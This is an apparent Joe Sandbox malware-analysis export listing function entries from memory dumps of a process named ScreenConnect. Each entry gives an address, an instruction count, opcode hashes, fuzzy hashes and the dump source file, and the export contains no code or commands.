                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: ef4b611fa0afe1713f9b79719f3f6428cb91f215504f8dac16b1d2ca92fe2b8a
                                                                                                                                                                                                                                                        • Instruction ID: 8c2a8448e04aa76fd8ce65bd87be2dd771c865c2e074032f0ef4a09329728a07
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ef4b611fa0afe1713f9b79719f3f6428cb91f215504f8dac16b1d2ca92fe2b8a
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E7F089773002186FCF069E989C409AF7BABEBC8360B00442AFA09C3351DB725D5197A5
                                                                                                                                                                                                                                                        Function 00DD6470 Relevance: .0, Instructions: 34COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: a4b8a1c7b2b3225bbb34be90c9b83cbd23495ce71e5bbead558b978979518c06
                                                                                                                                                                                                                                                        • Instruction ID: 764d29316912c9d935f072ee9cdd13a492d13583a6a54932d016704c4d03505d
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a4b8a1c7b2b3225bbb34be90c9b83cbd23495ce71e5bbead558b978979518c06
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B3F05E313002045F8714DAADE840D5EBBEDEFC53A5710862AE409CB394DB71ED0587A0
                                                                                                                                                                                                                                                        Function 00DDFA08 Relevance: .0, Instructions: 34COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 810b4eb4dc0a90c98dc3d076fa25b551e576587c3b91952c6c1619276e29b1ac
                                                                                                                                                                                                                                                        • Instruction ID: 5d9dabfce16a49588cc3c72c5762c292796df47d8ec23f23777eaa22bdf8c952
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 810b4eb4dc0a90c98dc3d076fa25b551e576587c3b91952c6c1619276e29b1ac
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7BF05EB17407056B8215A75AE89095ABBEEDBC4760344843AE61ECB304DF61EC058BA1
                                                                                                                                                                                                                                                        Function 00DDBCB9 Relevance: .0, Instructions: 34COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 2319fd05218e6ae2905e1ff0c3113bbe814c66d856eeebd1a44b69077152d7a7
                                                                                                                                                                                                                                                        • Instruction ID: 7802e76ac1fb85de33238fec25169063df99611c4a62affadfa4385aec664e1e
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2319fd05218e6ae2905e1ff0c3113bbe814c66d856eeebd1a44b69077152d7a7
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E5F08C72A093449FC318CFBA9C0068A7FEADFC6224B0981BB900CC3640E928A9018725
                                                                                                                                                                                                                                                        Function 00DDA9AF Relevance: .0, Instructions: 33COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 47780800e2c473c526205e0409d707bc749f40fd8f00de6a7e36a9b2e7f4dbfa
                                                                                                                                                                                                                                                        • Instruction ID: 04eef7376db58ca6f3de5bbd836aa6651751d09513559135fd131a80f8199e42
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 47780800e2c473c526205e0409d707bc749f40fd8f00de6a7e36a9b2e7f4dbfa
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C2F09B3350E2905FC7264A799C945953F79DEC726031E01E7D449C7343C5199C0EC771
                                                                                                                                                                                                                                                        Function 00DDAA48 Relevance: .0, Instructions: 33COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 2eceaf9fbcad482bbe0c01ab5eefb2736d961b9f00eb7de3a42369ebe03b72b0
                                                                                                                                                                                                                                                        • Instruction ID: 0837337a8f50134b2abe20446da9b8e665bc478e46fbbea66af429af5f127fdd
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2eceaf9fbcad482bbe0c01ab5eefb2736d961b9f00eb7de3a42369ebe03b72b0
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DDF05C363043804FC71A6BBEA4946697FE6DBCA66175C407EE505C7352CD344C498775
                                                                                                                                                                                                                                                        Function 00DD0E1F Relevance: .0, Instructions: 32COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: ba8aac4c0cf66d3fdaf494e7c9de092cc1c3cad263cab6ac9a78c90de500d8e2
                                                                                                                                                                                                                                                        • Instruction ID: 9211c5b6e97e45b5dcf32710d6d9118bd2769a35c40873f7d7a1cecc03f8b694
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ba8aac4c0cf66d3fdaf494e7c9de092cc1c3cad263cab6ac9a78c90de500d8e2
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3CF090316083815BC7026774A81449E7FA5DEC2320B1485BFD046CB392DA668C0A8BE5
                                                                                                                                                                                                                                                        Function 00DD31F0 Relevance: .0, Instructions: 31COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: a9abdeaf74b78c4c7ee7ebc6940b5f08a0c5ea10734e28c2f5ad0e962218e03b
                                                                                                                                                                                                                                                        • Instruction ID: 8ff1b484109cfbed99ed6997ff770ec57baefb5f61cf94238e645ed4cf249b47
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a9abdeaf74b78c4c7ee7ebc6940b5f08a0c5ea10734e28c2f5ad0e962218e03b
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2FF03270E0024CEFCB04EFA8D995A9CBBB8FB44340F2440A9C805EB250DB30AF84CB56
                                                                                                                                                                                                                                                        Function 00DD31E3 Relevance: .0, Instructions: 31COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 4aaad8e7140562013835ac47f3110a193a56b5fc664461360d0113483d025d37
                                                                                                                                                                                                                                                        • Instruction ID: 8934a637c6256d1863cf915113e9e9be92bbdb7b9778c6e61ac0dbc554172412
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4aaad8e7140562013835ac47f3110a193a56b5fc664461360d0113483d025d37
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C1F04930D09288EFCB05DFA8D88169CBFB0EF46341F2841AAC405E7251DB306F44DB12
                                                                                                                                                                                                                                                        Function 00DDE2A2 Relevance: .0, Instructions: 30COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 29997141221cb69e0635af09f0cf5564236e3fc75d42b5472108654aa251a16b
                                                                                                                                                                                                                                                        • Instruction ID: 3d37d5d0da37e94689e9abc2ee006f4f6075e28c834c57230370503dede0dd17
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 29997141221cb69e0635af09f0cf5564236e3fc75d42b5472108654aa251a16b
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 02F05E30B00218CFC759DF69D554AAEBBE5EF88350705806AE909DB378EB34DD01CB90
                                                                                                                                                                                                                                                        Function 00DDEBA0 Relevance: .0, Instructions: 30COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 1994b56c82164ae919f3d381b991d8fe1a39d901b70ddd6df34a7045fbe97199
                                                                                                                                                                                                                                                        • Instruction ID: 799963e69fcc96d77754c9f9d59b554e1923f91ef37c0154d6fc32391dece8a7
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1994b56c82164ae919f3d381b991d8fe1a39d901b70ddd6df34a7045fbe97199
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 09E065357041086B4704DA4ED400D5BBBAEEFC8320714C02BF809CB345DA31DD1287B4
                                                                                                                                                                                                                                                        Function 00DDE268 Relevance: .0, Instructions: 27COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: c70385d56ff4cdc2e348370c3631125984d4c8239fc651b2831ab5a83c7a625d
                                                                                                                                                                                                                                                        • Instruction ID: 122860bc0ce75f9192e7b1747b424e962865665ca9e40e248ff4d326acab798f
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c70385d56ff4cdc2e348370c3631125984d4c8239fc651b2831ab5a83c7a625d
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2EF0B271E00219DF8B44DFADC84069EFBF5EF49300B24806AD918EB210E331AA12CB90
                                                                                                                                                                                                                                                        Function 00DDE267 Relevance: .0, Instructions: 27COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 3f8199c3f8885a9284e9bc0f6e7bddd84642b8a3fce9cc9b5145a26e490cc5ca
                                                                                                                                                                                                                                                        • Instruction ID: 726c0df6aaad781878fba1531b865cf10ad089c6cc75fe5ddba85ff53302f646
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3f8199c3f8885a9284e9bc0f6e7bddd84642b8a3fce9cc9b5145a26e490cc5ca
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5CF0A471D00119DF8B44DFADD8416DEFBF1AF88300B24816AD818E7214D331AA12CF80
                                                                                                                                                                                                                                                        Function 00DDAA58 Relevance: .0, Instructions: 27COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 3a33cfaa0449a9bc449ec771000a4138bce2d83e5b16b99758704c7a606353e2
                                                                                                                                                                                                                                                        • Instruction ID: 4d03801d2644eeebd75c75d5461104ee7a46cf309c66ca908827ab6bebe1cad2
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3a33cfaa0449a9bc449ec771000a4138bce2d83e5b16b99758704c7a606353e2
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A7E0263B3003545B87153A9F748862EBBDBEBC8A62B58443DF60AC3340CE718C0983B4
                                                                                                                                                                                                                                                        Function 00DD4EEB Relevance: .0, Instructions: 26COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 65cdfc7a788124cfe9277f3f67f758dc372d9efee53997691f51246a7db00461
                                                                                                                                                                                                                                                        • Instruction ID: 24572d3dcee37d4d20e5f4dde07631734b84bed09e5255d35258c81af7e4a11b
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 65cdfc7a788124cfe9277f3f67f758dc372d9efee53997691f51246a7db00461
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 41E022715083047FC7089BA9E85195DBFE8EF8B320B0440ABE088C7382D932A90487A8
                                                                                                                                                                                                                                                        Function 00DD5923 Relevance: .0, Instructions: 26COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: c21abf78e34cbbae9d48b4dfd27247b4de1e90f0bb23f30dac1faaab6c56b141
                                                                                                                                                                                                                                                        • Instruction ID: 8b662995f85a27962b682fcb7b17f166bbf3629eb49fabc01ebc7e6f28c70cf6
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c21abf78e34cbbae9d48b4dfd27247b4de1e90f0bb23f30dac1faaab6c56b141
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3DE065353111485FC705EBB9E85995D7BA6EFDA261314416AE516C3385CA309C06CF50
                                                                                                                                                                                                                                                        Function 00DD0E30 Relevance: .0, Instructions: 25COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: a2fe8db3e9ad898ad01754c197fb5e75229aeb53e86541d12417270bd4caf0a1
                                                                                                                                                                                                                                                        • Instruction ID: dc3377bd02dcd8ccdf4dfd65ce5adb96dccece535868aeea4ecb2397a204a297
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a2fe8db3e9ad898ad01754c197fb5e75229aeb53e86541d12417270bd4caf0a1
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D3E09A316003046783067769E80599EBA9ADFC2361710843AE50ACB391EE72DC0A8BF8
                                                                                                                                                                                                                                                        Function 00DDF950 Relevance: .0, Instructions: 25COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: b3f5c2fb8f6f65422ac61a8dd79946b5c3a8bccedf694f9acfe944014221c3ad
                                                                                                                                                                                                                                                        • Instruction ID: c27c1623c857bf0235c7750249c776cd01f208d7e9d1d1dc762c8b851aa54e7d
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b3f5c2fb8f6f65422ac61a8dd79946b5c3a8bccedf694f9acfe944014221c3ad
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1EE02C32B022001BC304A62AE840967B3BAEBC9765B608839E50CC730BCE729C4786A0
                                                                                                                                                                                                                                                        Function 00DD0ECF Relevance: .0, Instructions: 24COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: d83651ded689e66b3c9f6a5b70894bac8ef408154aa1cf3b92958f2ccd2890d3
                                                                                                                                                                                                                                                        • Instruction ID: 283ac61502bb58485586c3273bfe7801b20d2be87985e2b0e4a1719ea759890f
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d83651ded689e66b3c9f6a5b70894bac8ef408154aa1cf3b92958f2ccd2890d3
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9CE0DFA65092909BE3029BA8ACB05613F54EE92308B1884DBD0C58B367EB16D943C2A0
                                                                                                                                                                                                                                                        Function 00DD5930 Relevance: .0, Instructions: 22COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: d16af2dfc7b1f17038285e4904ede8cbe0f4090aaf91e9f7c9dc4dd87070d230
                                                                                                                                                                                                                                                        • Instruction ID: 8568c764c504f623f1d59133f587076eae9f2c984b28f2cd0e53393ba62cd16b
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d16af2dfc7b1f17038285e4904ede8cbe0f4090aaf91e9f7c9dc4dd87070d230
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 40E086353112145F8304B67DE40855E7B9ADBD92613104125E516C3388CE309C02CB94
                                                                                                                                                                                                                                                        Function 00DD3257 Relevance: .0, Instructions: 21COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: de7908055a514372a249c4b704bd2c8aa117bc789c4c79892e2116e6ec063fff
                                                                                                                                                                                                                                                        • Instruction ID: 88fff517dbe6328047a7a93585872704cf09bafb12d1c333eb812508c2cc6860
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: de7908055a514372a249c4b704bd2c8aa117bc789c4c79892e2116e6ec063fff
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0EE09231209A854FC716DBACF841A8E3BF5EFCA250B1809AAE4418B167CB64B94987D5
                                                                                                                                                                                                                                                        Function 00DDBC81 Relevance: .0, Instructions: 21COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 3cef936298361c1e83ff61793868bf4f88b3532ecdbe52337d56b94f939f7dd0
                                                                                                                                                                                                                                                        • Instruction ID: 08043dabb41442efa44df99f7920e3ccfedfd01fbfdf51dcd7002b0b48ea368b
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3cef936298361c1e83ff61793868bf4f88b3532ecdbe52337d56b94f939f7dd0
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 33E0DF714442408FC309DB3CE8C92C8BFE0EB42325B89099EC1C18BB11CB38A4479792
                                                                                                                                                                                                                                                        Function 00DD597B Relevance: .0, Instructions: 19COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: ce062bf70144992b87e9c6797a370129ee15cdb1e3905a2f6ca945bab1bf6b0a
                                                                                                                                                                                                                                                        • Instruction ID: 3306324ea8d2efad4ff458ebb380238703fcba18d93d9a48172931456a0ba616
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ce062bf70144992b87e9c6797a370129ee15cdb1e3905a2f6ca945bab1bf6b0a
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 58E04F75D45288DFCB05DFB8E952A4E7BF4EF4A200B1245EAD804D7362EB315E14DB41
                                                                                                                                                                                                                                                        Function 00DDED28 Relevance: .0, Instructions: 17COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 7e2cdaad15811d183bb54d176d33271da779b832c97bd6164e2a05f40b0258a6
